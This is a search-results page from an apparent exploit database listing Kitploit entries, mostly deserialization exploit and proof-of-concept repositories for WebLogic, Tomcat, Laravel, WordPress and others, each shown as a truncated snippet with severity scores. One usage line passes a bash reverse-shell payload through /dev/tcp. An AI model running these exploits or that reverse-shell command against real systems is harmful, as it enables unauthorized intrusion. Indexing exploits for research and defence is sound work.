Lucene search
+L

350 matches found

Kitploit
Kitploit
•added 2026/09/25 9:34 p.m.•8 views

effective-waffle

effective-waffle yet another sleep encryption thing. also used the default github repo name for this one. TpAllocWork + TpPostWork + TpWaitForWork + TpReleaseWork to create + execute + clean the callback. The callback is some scuffed assembly that queues up a ton of rop gadgets that will pop...

6AI score
SaveExploits0References2
Kitploit
Kitploit
•added 2026/09/25 7:31 p.m.•9 views

CVE-2020-2555

CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE com.supeream.CVE20202555 root@kitploit: / author:Y4er.com gadget: BadAttributeValueExpException.readObject com.tangosol.util.filter.LimitFilter.toString com.tangosol.util.extractor.ChainedExtractor.extract...

9.8CVSS8.5AI score0.97116EPSS
SaveExploits26References1
Kitploit
Kitploit
•added 2026/09/25 4:23 p.m.•10 views

POC_CVE-2020-2555

POCCVE-2020-2555 PoC para CVE-2020-2555 3 partes: Cliente y Servidor: para construir el objeto y enviarlo al Servidor, desencadenar la cadena de gadgets. Úsalo para construir el objeto propietario. Ataque: enviar el objeto a través del protocolo T3 con pwntools...

9.8CVSS8.3AI score0.97116EPSS
SaveExploits26
Kitploit
Kitploit
•added 2026/09/25 9:24 a.m.•14 views

gadgetinspector

Gadget Inspector Este proyecto inspecciona bibliotecas Java y classpaths en busca de cadenas de gadgets. Las cadenas de gadgets se utilizan para construir exploits para vulnerabilidades de deserialización. Al descubrir automáticamente posibles cadenas de gadgets en el classpath de una aplicación,...

6AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/25 8:01 a.m.•19 views

wordpress-php-object-helper

wordpress-php-object-helper About You have a Known plugin with a PHP object exploit?, but you need to determine which library to use to exploit the issue and run with phpggc. This should help you out. Example Output root@kitploit: $ python3 finder.py -u http://wordpress.lan -f wp-plugins.lst...

6.1AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/25 7:40 a.m.•11 views

session_reaper_lab

CVE-2025-54236 - SessionReaper Lab Docker environment for practical demonstration of CVE-2025-54236 SessionReaper: PHP Object Deserialization leading to RCE in Magento Open Source 2.4.7. Exclusive use in controlled environment. Do not run against systems without explicit authorization. About the...

9.1CVSS8.5AI score0.94532EPSS
SaveExploits9
Kitploit
Kitploit
•added 2026/09/24 11:34 p.m.•9 views

CVE-2021-2302

CVE-2021-2302 Author: quynhle Gadget chain root@kitploit: javax.management.BadAttributeValueExpException.readObject oracle.security.jps.az.internal.common.principals.toString oracle.security.jps.az.internal.common.principals.getResolvedPrincipal . . . con.newInstance...

9.8CVSS8.6AI score0.05667EPSS
SaveExploits1
Kitploit
Kitploit
•added 2026/09/24 7:07 p.m.•14 views

ysonet

YSoNet is a fork of the original YSoSerial.Net, currently maintained by @irsdl. Sites: ysonet.net or ysonet.com both open this repo. A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. What is YSoNet YSoNet previously known as ysoserial.net is a...

5.9AI score
SaveExploits0References6
Kitploit
Kitploit
•added 2026/09/24 3:11 p.m.•12 views

mojarragadget

mojarragadget description We found a new Java gadget chain in the Mojarra Library, this repo contains 2 POC to reproduce the exploit on version 2.3 and 3.0. More information here: https://www.synacktiv.com/publications/finding-gadgets-like-its-2015-part-1.html...

6.1AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 3:06 p.m.•11 views

CVE-2026-25632

CVE-2026-25632 — JSON Deserialization RCE in REST API Bugfix Challenge Inspired by a real 2026 vulnerability CVSS 10.0, actively exploited Based on: CVE-2026-25632 — Remote Code Execution via unsafe type-driven JSON deserialization discovered in the EPyT-Flow water-network simulation REST API and...

10CVSS6.2AI score0.0127EPSS
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 2:54 p.m.•6 views

Weblogic_CVE-2020-2883_POC

POC for weblogic CVE-2020-2883 poc1: root@kitploit: javax.management.BadAttributeValueExpException.readObject com.tangosol.internal.sleepycat.persist.evolve.Mutations.toString java.util.concurrent.ConcurrentSkipListMap$SubMap.size java.util.concurrent.ConcurrentSkipListMap$SubMap.isBeforeEnd...

9.8CVSS8.8AI score0.94928EPSS
SaveExploits11
Kitploit
Kitploit
•added 2026/09/24 11:36 a.m.•8 views

CVE-2025-55182-checker

CVE-2025-55182 Vulnerability Detector - Enhanced Edition A comprehensive vulnerability detection tool for CVE-2025-55182 in React/Next.js applications with multiple detection techniques. ⚠️ Legal Disclaimer FOR AUTHORIZED SECURITY TESTING AND RESEARCH PURPOSES ONLY This tool is designed for:...

10CVSS7.6AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
•added 2026/09/23 10:56 p.m.•11 views

CVE-2021-3129

CVE-2021-3129 CVE-2021-3129-Laravel Debug mode remote code execution vulnerability Affected versions and conditions Laravel = 8.4.2 Ignition 2.5.2 Environment setup docker pull vulhub/laravel:8.4.2 exp usage Download and execute in the same directory as exploit.py: git clone...

9.8CVSS8.5AI score0.99943EPSS
SaveExploits38References1
Kitploit
Kitploit
•added 2026/09/22 4:45 a.m.•6 views

CVE-2025-24813

CVE-2025-24813 Apache Tomcat - Remote Code Execution via Session Deserialization Unauthenticated partial PUT + path traversal + gadget-driven deserialization Description Apache Tomcat instances with the default servlet PUT enabled readonly=false allow writing files via HTTP PUT requests. By...

9.8CVSS8.2AI score0.99927EPSS
SaveExploits51
Kitploit
Kitploit
•added 2026/09/21 9:27 p.m.•10 views

CVE-2026-40860

camel-jms JMS ObjectMessage Unsafe Deserialization Reproducer CVE-2026-40860 This project demonstrates a Java deserialization vulnerability in Apache Camel's camel-jms component and, transitively, camel-sjms, camel-sjms2, camel-amqp, camel-activemq, camel-activemq6, tracked as CVE-2026-40860...

7.4AI score0.01534EPSS
SaveExploits2
Kitploit
Kitploit
•added 2026/09/21 2:28 p.m.•6 views

CVE-2020-2883

¿Qué es esto? Este proyecto, basado en weblogiccmd, es un PoC para CVE-2020-2883. Dos Gadgets Primero: root@kitploit: ObjectInputStream.readObject PriorityQueue.readObject PriorityQueue.heapify PriorityQueue.siftDown siftDownUsingComparator com.tangosol.util.comparator.ExtractorComparator.compare...

9.8CVSS8.8AI score0.94928EPSS
SaveExploits11
Kitploit
Kitploit
•added 2026/09/21 1:39 p.m.•7 views

CVE-2019-12814

CVE-2019-12814 CVE-2019-12814:Jackson JDOM XSLTransformer Gadget...

5.9CVSS6.9AI score0.10902EPSS
SaveExploits0
Kitploit
Kitploit
•added 2026/09/21 9:26 a.m.•20 views

CVE-2026-69836-EXP

CVE-2026-69836 Entra ID Unauthenticated RCE Proof of Concept Overview CVE-2026-69836 is a critical unauthenticated remote code execution vulnerability in Microsoft Entra ID due to improper deserialization of untrusted data CWE-502. The flaw allows attackers to execute arbitrary code over the...

10CVSS9.4AI score0.01532EPSS
SaveExploits0
Kitploit
Kitploit
•added 2026/09/20 10:58 p.m.•9 views

CVE-2023-26326_Buddyform_exploit

usage: python exploit.py "/wp-admin/admin-ajax.php" 'bash -c "bash -i & /dev/tcp// 0&1"' Originally, CVE-2023–26326 required gadget chains to exploit it as a deserialization vulnerability. This method is no longer feasible on newer WordPress sites running on PHP 8+; however, by chaining with...

9.8CVSS8.2AI score0.03824EPSS
SaveExploits5References1
Kitploit
Kitploit
•added 2026/09/20 5:37 p.m.•11 views

CVE-2025-24813-PoC

CVE-2025-24813-PoC CVE-2025-24813 affects Apache Tomcat - if it's a vulnerable version and spectacularly misconfigured, an attacker can get RCE with one GET and one POST. More info here This is Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng's script from the recent writeup modified to accept...

9.8CVSS8.5AI score0.99927EPSS
SaveExploits51References1
Rows per page
Query Builder